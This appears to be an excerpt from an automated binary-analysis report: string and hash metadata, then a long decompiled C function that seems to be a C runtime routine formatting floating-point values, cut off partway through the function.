                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                    • API String ID: 2821348736-3508440684
                                                    • Opcode ID: 671ac035d0f10c9ce80a171122cc9f40c6f2af22e2294d7f5255637effa13b9c
                                                    • Instruction ID: 95114e75acfa216c9d21595b95490e12a13a6a2cf4e48eda25aeede841d1bbb5
                                                    • Opcode Fuzzy Hash: 671ac035d0f10c9ce80a171122cc9f40c6f2af22e2294d7f5255637effa13b9c
                                                    • Instruction Fuzzy Hash: FCC10771904644AADB21EB74CC45FFEB3A8EF04300F04465EFA5AE7282DB34AB44DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 68%
                                                    			E00CED8EE(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
                                                    				signed int _v8;
                                                    				signed int _v32;
                                                    				signed int _v36;
                                                    				char _v460;
                                                    				signed int _v464;
                                                    				void _v468;
                                                    				signed int _v472;
                                                    				signed int _v932;
                                                    				signed int _v936;
                                                    				signed int _v1392;
                                                    				signed int _v1396;
                                                    				signed int _v1400;
                                                    				char _v1860;
                                                    				signed int _v1864;
                                                    				signed int _v1865;
                                                    				signed int _v1872;
                                                    				signed int _v1876;
                                                    				signed int _v1880;
                                                    				signed int _v1884;
                                                    				signed int _v1888;
                                                    				signed int _v1892;
                                                    				signed int _v1896;
                                                    				intOrPtr _v1900;
                                                    				signed int _v1904;
                                                    				signed int _v1908;
                                                    				signed int _v1912;
                                                    				signed int _v1916;
                                                    				signed int _v1920;
                                                    				signed int _v1924;
                                                    				signed int _v1928;
                                                    				char _v1936;
                                                    				char _v1944;
                                                    				char _v2404;
                                                    				signed int _v2408;
                                                    				signed int _t743;
                                                    				signed int _t753;
                                                    				signed int _t754;
                                                    				intOrPtr _t763;
                                                    				signed int _t764;
                                                    				intOrPtr _t767;
                                                    				intOrPtr _t770;
                                                    				intOrPtr _t772;
                                                    				intOrPtr _t773;
                                                    				void* _t774;
                                                    				signed int _t777;
                                                    				signed int _t778;
                                                    				signed int _t784;
                                                    				void* _t789;
                                                    				signed int _t790;
                                                    				intOrPtr _t792;
                                                    				void* _t793;
                                                    				signed int _t794;
                                                    				signed int _t795;
                                                    				signed int _t796;
                                                    				signed int _t805;
                                                    				signed int _t810;
                                                    				signed int _t811;
                                                    				signed int _t812;
                                                    				signed int _t815;
                                                    				signed int _t816;
                                                    				signed int _t817;
                                                    				signed int _t819;
                                                    				signed int _t820;
                                                    				signed int _t825;
                                                    				signed int _t826;
                                                    				signed int _t832;
                                                    				signed int _t833;
                                                    				signed int _t836;
                                                    				signed int _t841;
                                                    				signed int _t849;
                                                    				signed int* _t852;
                                                    				signed int _t856;
                                                    				signed int _t867;
                                                    				signed int _t868;
                                                    				signed int _t870;
                                                    				char* _t871;
                                                    				signed int _t874;
                                                    				signed int _t878;
                                                    				signed int _t879;
                                                    				signed int _t884;
                                                    				signed int _t886;
                                                    				signed int _t891;
                                                    				signed int _t900;
                                                    				signed int _t903;
                                                    				signed int _t905;
                                                    				signed int _t908;
                                                    				signed int _t909;
                                                    				signed int _t910;
                                                    				signed int _t913;
                                                    				signed int _t926;
                                                    				signed int _t927;
                                                    				signed int _t929;
                                                    				char* _t930;
                                                    				signed int _t933;
                                                    				signed int _t937;
                                                    				signed int _t938;
                                                    				signed int* _t940;
                                                    				signed int _t943;
                                                    				signed int _t945;
                                                    				signed int _t950;
                                                    				signed int _t958;
                                                    				signed int _t961;
                                                    				signed int _t965;
                                                    				signed int* _t972;
                                                    				intOrPtr _t974;
                                                    				void* _t975;
                                                    				intOrPtr* _t977;
                                                    				signed int* _t981;
                                                    				unsigned int _t992;
                                                    				signed int _t993;
                                                    				void* _t996;
                                                    				signed int _t997;
                                                    				void* _t999;
                                                    				signed int _t1000;
                                                    				signed int _t1001;
                                                    				signed int _t1002;
                                                    				signed int _t1012;
                                                    				signed int _t1017;
                                                    				signed int _t1020;
                                                    				unsigned int _t1023;
                                                    				signed int _t1024;
                                                    				void* _t1027;
                                                    				signed int _t1028;
                                                    				void* _t1030;
                                                    				signed int _t1031;
                                                    				signed int _t1032;
                                                    				signed int _t1033;
                                                    				signed int _t1038;
                                                    				signed int* _t1043;
                                                    				signed int _t1045;
                                                    				signed int _t1055;
                                                    				void* _t1056;
                                                    				void _t1058;
                                                    				signed int _t1061;
                                                    				void* _t1064;
                                                    				void* _t1071;
                                                    				signed int _t1077;
                                                    				signed int _t1078;
                                                    				void* _t1080;
                                                    				signed int _t1081;
                                                    				signed int _t1082;
                                                    				signed int _t1084;
                                                    				signed int _t1085;
                                                    				signed int _t1086;
                                                    				signed int _t1090;
                                                    				signed int _t1094;
                                                    				signed int _t1095;
                                                    				signed int _t1096;
                                                    				signed int _t1098;
                                                    				signed int _t1099;
                                                    				signed int _t1100;
                                                    				signed int _t1101;
                                                    				signed int _t1102;
                                                    				signed int _t1103;
                                                    				signed int _t1105;
                                                    				signed int _t1106;
                                                    				signed int _t1107;
                                                    				signed int _t1108;
                                                    				signed int _t1109;
                                                    				signed int _t1110;
                                                    				unsigned int _t1111;
                                                    				void* _t1114;
                                                    				intOrPtr _t1116;
                                                    				signed int _t1117;
                                                    				signed int _t1118;
                                                    				signed int _t1119;
                                                    				signed int* _t1123;
                                                    				void* _t1127;
                                                    				void* _t1128;
                                                    				signed int _t1129;
                                                    				signed int _t1130;
                                                    				signed int _t1131;
                                                    				signed int _t1134;
                                                    				signed int _t1135;
                                                    				signed int _t1140;
                                                    				signed int _t1142;
                                                    				signed int _t1143;
                                                    				signed int _t1151;
                                                    				signed int _t1152;
                                                    				signed int _t1153;
                                                    				signed int _t1154;
                                                    				signed int _t1155;
                                                    				signed int _t1156;
                                                    				signed int _t1157;
                                                    				signed int _t1161;
                                                    				signed int _t1162;
                                                    				signed int _t1163;
                                                    				signed int _t1164;
                                                    				signed int _t1165;
                                                    				unsigned int _t1168;
                                                    				void* _t1172;
                                                    				void* _t1173;
                                                    				unsigned int _t1174;
                                                    				signed int _t1179;
                                                    				signed int _t1180;
                                                    				signed int _t1182;
                                                    				signed int _t1183;
                                                    				intOrPtr* _t1185;
                                                    				signed int _t1186;
                                                    				void* _t1187;
                                                    				signed int _t1188;
                                                    				signed int _t1189;
                                                    				signed int _t1192;
                                                    				signed int _t1194;
                                                    				signed int _t1195;
                                                    				void* _t1196;
                                                    				signed int _t1197;
                                                    				signed int _t1198;
                                                    				signed int _t1199;
                                                    				void* _t1202;
                                                    				signed int _t1203;
                                                    				signed int _t1204;
                                                    				signed int _t1205;
                                                    				signed int _t1206;
                                                    				signed int _t1207;
                                                    				signed int* _t1210;
                                                    				signed int _t1211;
                                                    				signed int _t1212;
                                                    				signed int _t1213;
                                                    				signed int _t1214;
                                                    				intOrPtr* _t1216;
                                                    				intOrPtr* _t1217;
                                                    				signed int _t1219;
                                                    				signed int _t1221;
                                                    				signed int _t1224;
                                                    				signed int _t1230;
                                                    				signed int _t1234;
                                                    				signed int _t1235;
                                                    				void* _t1236;
                                                    				signed int _t1240;
                                                    				signed int _t1243;
                                                    				signed int _t1244;
                                                    				signed int _t1245;
                                                    				signed int _t1246;
                                                    				signed int _t1247;
                                                    				signed int _t1248;
                                                    				signed int _t1250;
                                                    				signed int _t1251;
                                                    				signed int _t1252;
                                                    				signed int _t1253;
                                                    				signed int _t1255;
                                                    				signed int _t1256;
                                                    				signed int _t1257;
                                                    				signed int _t1258;
                                                    				signed int _t1259;
                                                    				signed int _t1261;
                                                    				signed int _t1262;
                                                    				signed int _t1264;
                                                    				signed int _t1266;
                                                    				signed int _t1268;
                                                    				signed int _t1271;
                                                    				signed int _t1273;
                                                    				signed int* _t1274;
                                                    				signed int* _t1277;
                                                    				signed int _t1286;
                                                    
                                                    				_t1142 = __edx;
                                                    				_t1271 = _t1273;
                                                    				_t1274 = _t1273 - 0x964;
                                                    				_t743 =  *0xcfe7ac; // 0x349e4b74
                                                    				_v8 = _t743 ^ _t1271;
                                                    				_push(__ebx);
                                                    				_t1055 = _a20;
                                                    				_push(__esi);
                                                    				_push(__edi);
                                                    				_t1185 = _a16;
                                                    				_v1924 = _t1185;
                                                    				_v1920 = _t1055;
                                                    				E00CED416( &_v1944, __eflags);
                                                    				_t1234 = _a8;
                                                    				_t748 = 0x2d;
                                                    				if((_t1234 & 0x80000000) == 0) {
                                                    					_t748 = 0x120;
                                                    				}
                                                    				 *_t1185 = _t748;
                                                    				 *((intOrPtr*)(_t1185 + 8)) = _t1055;
                                                    				_t1186 = _a4;
                                                    				if((_t1234 & 0x7ff00000) != 0) {
                                                    					L5:
                                                    					_t753 = E00CE9994( &_a4);
                                                    					_pop(_t1070);
                                                    					__eflags = _t753;
                                                    					if(_t753 != 0) {
                                                    						_t1070 = _v1924;
                                                    						 *((intOrPtr*)(_v1924 + 4)) = 1;
                                                    					}
                                                    					_t754 = _t753 - 1;
                                                    					__eflags = _t754;
                                                    					if(_t754 == 0) {
                                                    						_push("1#INF");
                                                    						goto L308;
                                                    					} else {
                                                    						_t777 = _t754 - 1;
                                                    						__eflags = _t777;
                                                    						if(_t777 == 0) {
                                                    							_push("1#QNAN");
                                                    							goto L308;
                                                    						} else {
                                                    							_t778 = _t777 - 1;
                                                    							__eflags = _t778;
                                                    							if(_t778 == 0) {
                                                    								_push("1#SNAN");
                                                    								goto L308;
                                                    							} else {
                                                    								__eflags = _t778 == 1;
                                                    								if(_t778 == 1) {
                                                    									_push("1#IND");
                                                    									goto L308;
                                                    								} else {
                                                    									_v1928 = _v1928 & 0x00000000;
                                                    									_a4 = _t1186;
                                                    									_a8 = _t1234 & 0x7fffffff;
                                                    									_t1286 = _a4;
                                                    									asm("fst qword [ebp-0x768]");
                                                    									_t1188 = _v1896;
                                                    									_v1916 = _a12 + 1;
                                                    									_t1077 = _t1188 >> 0x14;
                                                    									_t784 = _t1077 & 0x000007ff;
                                                    									__eflags = _t784;
                                                    									if(_t784 != 0) {
                                                    										_t1143 = 0;
                                                    										_t784 = 0;
                                                    										__eflags = 0;
                                                    									} else {
                                                    										_t1143 = 1;
                                                    									}
                                                    									_t1189 = _t1188 & 0x000fffff;
                                                    									_t1058 = _v1900 + _t784;
                                                    									asm("adc edi, esi");
                                                    									__eflags = _t1143;
                                                    									_t1078 = _t1077 & 0x000007ff;
                                                    									_t1240 = _t1078 - 0x434 + (0 | _t1143 != 0x00000000) + 1;
                                                    									_v1872 = _t1240;
                                                    									E00CEF460(_t1078, _t1286);
                                                    									_push(_t1078);
                                                    									 *_t1274 = _t1286;
                                                    									_t789 = E00CEF570();
                                                    									_t1080 = _t1078;
                                                    									_t790 = L00CF23A0(_t789, _t1058, _t1080, _t1143);
                                                    									_v1904 = _t790;
                                                    									__eflags = _t790 - 0x7fffffff;
                                                    									if(_t790 == 0x7fffffff) {
                                                    										L16:
                                                    										__eflags = 0;
                                                    										_v1904 = 0;
                                                    									} else {
                                                    										__eflags = _t790 - 0x80000000;
                                                    										if(_t790 == 0x80000000) {
                                                    											goto L16;
                                                    										}
                                                    									}
                                                    									_v468 = _t1058;
                                                    									__eflags = _t1189;
                                                    									_v464 = _t1189;
                                                    									_t1061 = (0 | _t1189 != 0x00000000) + 1;
                                                    									_v472 = _t1061;
                                                    									__eflags = _t1240;
                                                    									if(_t1240 < 0) {
                                                    										__eflags = _t1240 - 0xfffffc02;
                                                    										if(_t1240 == 0xfffffc02) {
                                                    											L101:
                                                    											_t792 =  *((intOrPtr*)(_t1271 + _t1061 * 4 - 0x1d4));
                                                    											_t195 =  &_v1896;
                                                    											 *_t195 = _v1896 & 0x00000000;
                                                    											__eflags =  *_t195;
                                                    											asm("bsr eax, eax");
                                                    											if( *_t195 == 0) {
                                                    												_t1081 = 0;
                                                    												__eflags = 0;
                                                    											} else {
                                                    												_t1081 = _t792 + 1;
                                                    											}
                                                    											_t793 = 0x20;
                                                    											_t794 = _t793 - _t1081;
                                                    											__eflags = _t794 - 1;
                                                    											_t795 = _t794 & 0xffffff00 | _t794 - 0x00000001 > 0x00000000;
                                                    											__eflags = _t1061 - 0x73;
                                                    											_v1865 = _t795;
                                                    											_t1082 = _t1081 & 0xffffff00 | _t1061 - 0x00000073 > 0x00000000;
                                                    											__eflags = _t1061 - 0x73;
                                                    											if(_t1061 != 0x73) {
                                                    												L107:
                                                    												_t796 = 0;
                                                    												__eflags = 0;
                                                    											} else {
                                                    												__eflags = _t795;
                                                    												if(_t795 == 0) {
                                                    													goto L107;
                                                    												} else {
                                                    													_t796 = 1;
                                                    												}
                                                    											}
                                                    											__eflags = _t1082;
                                                    											if(_t1082 != 0) {
                                                    												L126:
                                                    												_v1400 = _v1400 & 0x00000000;
                                                    												_t224 =  &_v472;
                                                    												 *_t224 = _v472 & 0x00000000;
                                                    												__eflags =  *_t224;
                                                    												E00CEBDE1( &_v468, 0x1cc,  &_v1396, 0);
                                                    												_t1274 =  &(_t1274[4]);
                                                    											} else {
                                                    												__eflags = _t796;
                                                    												if(_t796 != 0) {
                                                    													goto L126;
                                                    												} else {
                                                    													_t1109 = 0x72;
                                                    													__eflags = _t1061 - _t1109;
                                                    													if(_t1061 < _t1109) {
                                                    														_t1109 = _t1061;
                                                    													}
                                                    													__eflags = _t1109 - 0xffffffff;
                                                    													if(_t1109 != 0xffffffff) {
                                                    														_t1258 = _t1109;
                                                    														_t1216 =  &_v468 + _t1109 * 4;
                                                    														_v1880 = _t1216;
                                                    														while(1) {
                                                    															__eflags = _t1258 - _t1061;
                                                    															if(_t1258 >= _t1061) {
                                                    																_t208 =  &_v1876;
                                                    																 *_t208 = _v1876 & 0x00000000;
                                                    																__eflags =  *_t208;
                                                    															} else {
                                                    																_v1876 =  *_t1216;
                                                    															}
                                                    															_t210 = _t1258 - 1; // 0x70
                                                    															__eflags = _t210 - _t1061;
                                                    															if(_t210 >= _t1061) {
                                                    																_t1168 = 0;
                                                    																__eflags = 0;
                                                    															} else {
                                                    																_t1168 =  *(_t1216 - 4);
                                                    															}
                                                    															_t1216 = _t1216 - 4;
                                                    															_t972 = _v1880;
                                                    															_t1258 = _t1258 - 1;
                                                    															 *_t972 = _t1168 >> 0x0000001f ^ _v1876 + _v1876;
                                                    															_v1880 = _t972 - 4;
                                                    															__eflags = _t1258 - 0xffffffff;
                                                    															if(_t1258 == 0xffffffff) {
                                                    																break;
                                                    															}
                                                    															_t1061 = _v472;
                                                    														}
                                                    														_t1240 = _v1872;
                                                    													}
                                                    													__eflags = _v1865;
                                                    													if(_v1865 == 0) {
                                                    														_v472 = _t1109;
                                                    													} else {
                                                    														_t218 = _t1109 + 1; // 0x73
                                                    														_v472 = _t218;
                                                    													}
                                                    												}
                                                    											}
                                                    											_t1192 = 1 - _t1240;
                                                    											E00CDFFF0(_t1192,  &_v1396, 0, 1);
                                                    											__eflags = 1;
                                                    											 *(_t1271 + 0xbad63d) = 1 << (_t1192 & 0x0000001f);
                                                    											_t805 = 0xbadbae;
                                                    										} else {
                                                    											_v1396 = _v1396 & 0x00000000;
                                                    											_t1110 = 2;
                                                    											_v1392 = 0x100000;
                                                    											_v1400 = _t1110;
                                                    											__eflags = _t1061 - _t1110;
                                                    											if(_t1061 == _t1110) {
                                                    												_t1172 = 0;
                                                    												__eflags = 0;
                                                    												while(1) {
                                                    													_t974 =  *((intOrPtr*)(_t1271 + _t1172 - 0x570));
                                                    													__eflags = _t974 -  *((intOrPtr*)(_t1271 + _t1172 - 0x1d0));
                                                    													if(_t974 !=  *((intOrPtr*)(_t1271 + _t1172 - 0x1d0))) {
                                                    														goto L101;
                                                    													}
                                                    													_t1172 = _t1172 + 4;
                                                    													__eflags = _t1172 - 8;
                                                    													if(_t1172 != 8) {
                                                    														continue;
                                                    													} else {
                                                    														_t166 =  &_v1896;
                                                    														 *_t166 = _v1896 & 0x00000000;
                                                    														__eflags =  *_t166;
                                                    														asm("bsr eax, edi");
                                                    														if( *_t166 == 0) {
                                                    															_t1173 = 0;
                                                    															__eflags = 0;
                                                    														} else {
                                                    															_t1173 = _t974 + 1;
                                                    														}
                                                    														_t975 = 0x20;
                                                    														_t1259 = _t1110;
                                                    														__eflags = _t975 - _t1173 - _t1110;
                                                    														_t977 =  &_v460;
                                                    														_v1880 = _t977;
                                                    														_t1217 = _t977;
                                                    														_t171 =  &_v1865;
                                                    														 *_t171 = _t975 - _t1173 - _t1110 > 0;
                                                    														__eflags =  *_t171;
                                                    														while(1) {
                                                    															__eflags = _t1259 - _t1061;
                                                    															if(_t1259 >= _t1061) {
                                                    																_t173 =  &_v1876;
                                                    																 *_t173 = _v1876 & 0x00000000;
                                                    																__eflags =  *_t173;
                                                    															} else {
                                                    																_v1876 =  *_t1217;
                                                    															}
                                                    															_t175 = _t1259 - 1; // 0x0
                                                    															__eflags = _t175 - _t1061;
                                                    															if(_t175 >= _t1061) {
                                                    																_t1174 = 0;
                                                    																__eflags = 0;
                                                    															} else {
                                                    																_t1174 =  *(_t1217 - 4);
                                                    															}
                                                    															_t1217 = _t1217 - 4;
                                                    															_t981 = _v1880;
                                                    															_t1259 = _t1259 - 1;
                                                    															 *_t981 = _t1174 >> 0x0000001e ^ _v1876 << 0x00000002;
                                                    															_v1880 = _t981 - 4;
                                                    															__eflags = _t1259 - 0xffffffff;
                                                    															if(_t1259 == 0xffffffff) {
                                                    																break;
                                                    															}
                                                    															_t1061 = _v472;
                                                    														}
                                                    														__eflags = _v1865;
                                                    														_t1111 = _t1110 - _v1872;
                                                    														_v472 = (0 | _v1865 != 0x00000000) + _t1110;
                                                    														_t1219 = _t1111 >> 5;
                                                    														_v1884 = _t1111;
                                                    														_t1261 = _t1219 << 2;
                                                    														E00CDFFF0(_t1219,  &_v1396, 0, _t1261);
                                                    														 *(_t1271 + _t1261 - 0x570) = 1 << (_v1884 & 0x0000001f);
                                                    														_t805 = _t1219 + 1;
                                                    													}
                                                    													goto L128;
                                                    												}
                                                    											}
                                                    											goto L101;
                                                    										}
                                                    										L128:
                                                    										_v1400 = _t805;
                                                    										_t1064 = 0x1cc;
                                                    										_v936 = _t805;
                                                    										__eflags = _t805 << 2;
                                                    										E00CEBDE1( &_v932, 0x1cc,  &_v1396, _t805 << 2);
                                                    										_t1277 =  &(_t1274[7]);
                                                    									} else {
                                                    										_v1396 = _v1396 & 0x00000000;
                                                    										_t1262 = 2;
                                                    										_v1392 = 0x100000;
                                                    										_v1400 = _t1262;
                                                    										__eflags = _t1061 - _t1262;
                                                    										if(_t1061 != _t1262) {
                                                    											L53:
                                                    											_t992 = _v1872 + 1;
                                                    											_t993 = _t992 & 0x0000001f;
                                                    											_t1114 = 0x20;
                                                    											_v1876 = _t993;
                                                    											_t1221 = _t992 >> 5;
                                                    											_v1872 = _t1221;
                                                    											_v1908 = _t1114 - _t993;
                                                    											_t996 = E00CDF0C0(1, _t1114 - _t993, 0);
                                                    											_t1116 =  *((intOrPtr*)(_t1271 + _t1061 * 4 - 0x1d4));
                                                    											_t997 = _t996 - 1;
                                                    											_t108 =  &_v1896;
                                                    											 *_t108 = _v1896 & 0x00000000;
                                                    											__eflags =  *_t108;
                                                    											asm("bsr ecx, ecx");
                                                    											_v1884 = _t997;
                                                    											_v1912 =  !_t997;
                                                    											if( *_t108 == 0) {
                                                    												_t1117 = 0;
                                                    												__eflags = 0;
                                                    											} else {
                                                    												_t1117 = _t1116 + 1;
                                                    											}
                                                    											_t999 = 0x20;
                                                    											_t1000 = _t999 - _t1117;
                                                    											_t1179 = _t1061 + _t1221;
                                                    											__eflags = _v1876 - _t1000;
                                                    											_v1892 = _t1179;
                                                    											_t1001 = _t1000 & 0xffffff00 | _v1876 - _t1000 > 0x00000000;
                                                    											__eflags = _t1179 - 0x73;
                                                    											_v1865 = _t1001;
                                                    											_t1118 = _t1117 & 0xffffff00 | _t1179 - 0x00000073 > 0x00000000;
                                                    											__eflags = _t1179 - 0x73;
                                                    											if(_t1179 != 0x73) {
                                                    												L59:
                                                    												_t1002 = 0;
                                                    												__eflags = 0;
                                                    											} else {
                                                    												__eflags = _t1001;
                                                    												if(_t1001 == 0) {
                                                    													goto L59;
                                                    												} else {
                                                    													_t1002 = 1;
                                                    												}
                                                    											}
                                                    											__eflags = _t1118;
                                                    											if(_t1118 != 0) {
                                                    												L81:
                                                    												__eflags = 0;
                                                    												_t1064 = 0x1cc;
                                                    												_v1400 = 0;
                                                    												_v472 = 0;
                                                    												E00CEBDE1( &_v468, 0x1cc,  &_v1396, 0);
                                                    												_t1274 =  &(_t1274[4]);
                                                    											} else {
                                                    												__eflags = _t1002;
                                                    												if(_t1002 != 0) {
                                                    													goto L81;
                                                    												} else {
                                                    													_t1119 = 0x72;
                                                    													__eflags = _t1179 - _t1119;
                                                    													if(_t1179 >= _t1119) {
                                                    														_t1179 = _t1119;
                                                    														_v1892 = _t1119;
                                                    													}
                                                    													_t1012 = _t1179;
                                                    													_v1880 = _t1012;
                                                    													__eflags = _t1179 - 0xffffffff;
                                                    													if(_t1179 != 0xffffffff) {
                                                    														_t1180 = _v1872;
                                                    														_t1264 = _t1179 - _t1180;
                                                    														__eflags = _t1264;
                                                    														_t1123 =  &_v468 + _t1264 * 4;
                                                    														_v1888 = _t1123;
                                                    														while(1) {
                                                    															__eflags = _t1012 - _t1180;
                                                    															if(_t1012 < _t1180) {
                                                    																break;
                                                    															}
                                                    															__eflags = _t1264 - _t1061;
                                                    															if(_t1264 >= _t1061) {
                                                    																_t1224 = 0;
                                                    																__eflags = 0;
                                                    															} else {
                                                    																_t1224 =  *_t1123;
                                                    															}
                                                    															__eflags = _t1264 - 1 - _t1061;
                                                    															if(_t1264 - 1 >= _t1061) {
                                                    																_t1017 = 0;
                                                    																__eflags = 0;
                                                    															} else {
                                                    																_t1017 =  *(_t1123 - 4);
                                                    															}
                                                    															_t1020 = _v1880;
                                                    															_t1123 = _v1888 - 4;
                                                    															_v1888 = _t1123;
                                                    															 *(_t1271 + _t1020 * 4 - 0x1d0) = (_t1224 & _v1884) << _v1876 | (_t1017 & _v1912) >> _v1908;
                                                    															_t1012 = _t1020 - 1;
                                                    															_t1264 = _t1264 - 1;
                                                    															_v1880 = _t1012;
                                                    															__eflags = _t1012 - 0xffffffff;
                                                    															if(_t1012 != 0xffffffff) {
                                                    																_t1061 = _v472;
                                                    																continue;
                                                    															}
                                                    															break;
                                                    														}
                                                    														_t1179 = _v1892;
                                                    														_t1221 = _v1872;
                                                    														_t1262 = 2;
                                                    													}
                                                    													__eflags = _t1221;
                                                    													if(_t1221 != 0) {
                                                    														__eflags = 0;
                                                    														memset( &_v468, 0, _t1221 << 2);
                                                    														_t1274 =  &(_t1274[3]);
                                                    													}
                                                    													__eflags = _v1865;
                                                    													_t1064 = 0x1cc;
                                                    													if(_v1865 == 0) {
                                                    														_v472 = _t1179;
                                                    													} else {
                                                    														_v472 = _t1179 + 1;
                                                    													}
                                                    												}
                                                    											}
                                                    											_v1392 = _v1392 & 0x00000000;
                                                    											_v1396 = _t1262;
                                                    											_v1400 = 1;
                                                    											_v936 = 1;
                                                    											_push(4);
                                                    										} else {
                                                    											_t1127 = 0;
                                                    											__eflags = 0;
                                                    											while(1) {
                                                    												__eflags =  *((intOrPtr*)(_t1271 + _t1127 - 0x570)) -  *((intOrPtr*)(_t1271 + _t1127 - 0x1d0));
                                                    												if( *((intOrPtr*)(_t1271 + _t1127 - 0x570)) !=  *((intOrPtr*)(_t1271 + _t1127 - 0x1d0))) {
                                                    													goto L53;
                                                    												}
                                                    												_t1127 = _t1127 + 4;
                                                    												__eflags = _t1127 - 8;
                                                    												if(_t1127 != 8) {
                                                    													continue;
                                                    												} else {
                                                    													_t1023 = _v1872 + 2;
                                                    													_t1024 = _t1023 & 0x0000001f;
                                                    													_t1128 = 0x20;
                                                    													_t1129 = _t1128 - _t1024;
                                                    													_v1888 = _t1024;
                                                    													_t1266 = _t1023 >> 5;
                                                    													_v1876 = _t1266;
                                                    													_v1908 = _t1129;
                                                    													_t1027 = E00CDF0C0(1, _t1129, 0);
                                                    													_v1896 = _v1896 & 0x00000000;
                                                    													_t1028 = _t1027 - 1;
                                                    													__eflags = _t1028;
                                                    													asm("bsr ecx, edi");
                                                    													_v1884 = _t1028;
                                                    													_v1912 =  !_t1028;
                                                    													if(_t1028 == 0) {
                                                    														_t1130 = 0;
                                                    														__eflags = 0;
                                                    													} else {
                                                    														_t1130 = _t1129 + 1;
                                                    													}
                                                    													_t1030 = 0x20;
                                                    													_t1031 = _t1030 - _t1130;
                                                    													_t1182 = _t1266 + 2;
                                                    													__eflags = _v1888 - _t1031;
                                                    													_v1880 = _t1182;
                                                    													_t1032 = _t1031 & 0xffffff00 | _v1888 - _t1031 > 0x00000000;
                                                    													__eflags = _t1182 - 0x73;
                                                    													_v1865 = _t1032;
                                                    													_t1131 = _t1130 & 0xffffff00 | _t1182 - 0x00000073 > 0x00000000;
                                                    													__eflags = _t1182 - 0x73;
                                                    													if(_t1182 != 0x73) {
                                                    														L28:
                                                    														_t1033 = 0;
                                                    														__eflags = 0;
                                                    													} else {
                                                    														__eflags = _t1032;
                                                    														if(_t1032 == 0) {
                                                    															goto L28;
                                                    														} else {
                                                    															_t1033 = 1;
                                                    														}
                                                    													}
                                                    													__eflags = _t1131;
                                                    													if(_t1131 != 0) {
                                                    														L50:
                                                    														__eflags = 0;
                                                    														_t1064 = 0x1cc;
                                                    														_v1400 = 0;
                                                    														_v472 = 0;
                                                    														E00CEBDE1( &_v468, 0x1cc,  &_v1396, 0);
                                                    														_t1274 =  &(_t1274[4]);
                                                    													} else {
                                                    														__eflags = _t1033;
                                                    														if(_t1033 != 0) {
                                                    															goto L50;
                                                    														} else {
                                                    															_t1134 = 0x72;
                                                    															__eflags = _t1182 - _t1134;
                                                    															if(_t1182 >= _t1134) {
                                                    																_t1182 = _t1134;
                                                    																_v1880 = _t1134;
                                                    															}
                                                    															_t1135 = _t1182;
                                                    															_v1892 = _t1135;
                                                    															__eflags = _t1182 - 0xffffffff;
                                                    															if(_t1182 != 0xffffffff) {
                                                    																_t1183 = _v1876;
                                                    																_t1268 = _t1182 - _t1183;
                                                    																__eflags = _t1268;
                                                    																_t1043 =  &_v468 + _t1268 * 4;
                                                    																_v1872 = _t1043;
                                                    																while(1) {
                                                    																	__eflags = _t1135 - _t1183;
                                                    																	if(_t1135 < _t1183) {
                                                    																		break;
                                                    																	}
                                                    																	__eflags = _t1268 - _t1061;
                                                    																	if(_t1268 >= _t1061) {
                                                    																		_t1230 = 0;
                                                    																		__eflags = 0;
                                                    																	} else {
                                                    																		_t1230 =  *_t1043;
                                                    																	}
                                                    																	__eflags = _t1268 - 1 - _t1061;
                                                    																	if(_t1268 - 1 >= _t1061) {
                                                    																		_t1045 = 0;
                                                    																		__eflags = 0;
                                                    																	} else {
                                                    																		_t1045 =  *(_v1872 - 4);
                                                    																	}
                                                    																	_t1140 = _v1892;
                                                    																	 *(_t1271 + _t1140 * 4 - 0x1d0) = (_t1045 & _v1912) >> _v1908 | (_t1230 & _v1884) << _v1888;
                                                    																	_t1135 = _t1140 - 1;
                                                    																	_t1268 = _t1268 - 1;
                                                    																	_t1043 = _v1872 - 4;
                                                    																	_v1892 = _t1135;
                                                    																	_v1872 = _t1043;
                                                    																	__eflags = _t1135 - 0xffffffff;
                                                    																	if(_t1135 != 0xffffffff) {
                                                    																		_t1061 = _v472;
                                                    																		continue;
                                                    																	}
                                                    																	break;
                                                    																}
                                                    																_t1182 = _v1880;
                                                    																_t1266 = _v1876;
                                                    															}
                                                    															__eflags = _t1266;
                                                    															if(_t1266 != 0) {
                                                    																__eflags = 0;
                                                    																memset( &_v468, 0, _t1266 << 2);
                                                    																_t1274 =  &(_t1274[3]);
                                                    															}
                                                    															__eflags = _v1865;
                                                    															_t1064 = 0x1cc;
                                                    															if(_v1865 == 0) {
                                                    																_v472 = _t1182;
                                                    															} else {
                                                    																_v472 = _t1182 + 1;
                                                    															}
                                                    														}
                                                    													}
                                                    													_v1392 = _v1392 & 0x00000000;
                                                    													_t1038 = 4;
                                                    													__eflags = 1;
                                                    													_v1396 = _t1038;
                                                    													_v1400 = 1;
                                                    													_v936 = 1;
                                                    													_push(_t1038);
                                                    												}
                                                    												goto L52;
                                                    											}
                                                    											goto L53;
                                                    										}
                                                    										L52:
                                                    										_push( &_v1396);
                                                    										_push(_t1064);
                                                    										_push( &_v932);
                                                    										E00CEBDE1();
                                                    										_t1277 =  &(_t1274[4]);
                                                    									}
                                                    									_t810 = _v1904;
                                                    									_t1084 = 0xa;
                                                    									_v1912 = _t1084;
                                                    									__eflags = _t810;
                                                    									if(_t810 < 0) {
                                                    										_t811 =  ~_t810;
                                                    										_t812 = _t811 / _t1084;
                                                    										_v1880 = _t812;
                                                    										_t1085 = _t811 % _t1084;
                                                    										_v1884 = _t1085;
                                                    										__eflags = _t812;
                                                    										if(_t812 == 0) {
                                                    											L249:
                                                    											__eflags = _t1085;
                                                    											if(_t1085 != 0) {
                                                    												_t849 =  *(0xcf83dc + _t1085 * 4);
                                                    												_v1896 = _t849;
                                                    												__eflags = _t849;
                                                    												if(_t849 == 0) {
                                                    													L260:
                                                    													__eflags = 0;
                                                    													_push(0);
                                                    													_v472 = 0;
                                                    													_v2408 = 0;
                                                    													goto L261;
                                                    												} else {
                                                    													__eflags = _t849 - 1;
                                                    													if(_t849 != 1) {
                                                    														_t1096 = _v472;
                                                    														__eflags = _t1096;
                                                    														if(_t1096 != 0) {
                                                    															_t1199 = 0;
                                                    															_t1248 = 0;
                                                    															__eflags = 0;
                                                    															do {
                                                    																_t1153 = _t849 *  *(_t1271 + _t1248 * 4 - 0x1d0) >> 0x20;
